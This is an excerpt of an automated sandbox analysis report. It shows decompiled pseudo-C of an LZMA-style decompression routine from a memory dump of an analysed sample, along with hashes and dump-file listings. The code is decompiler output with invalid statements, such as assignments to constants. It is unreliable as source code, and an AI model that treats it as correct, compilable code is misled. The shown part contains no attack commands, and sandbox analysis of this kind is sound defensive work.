												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406398, Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406398() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
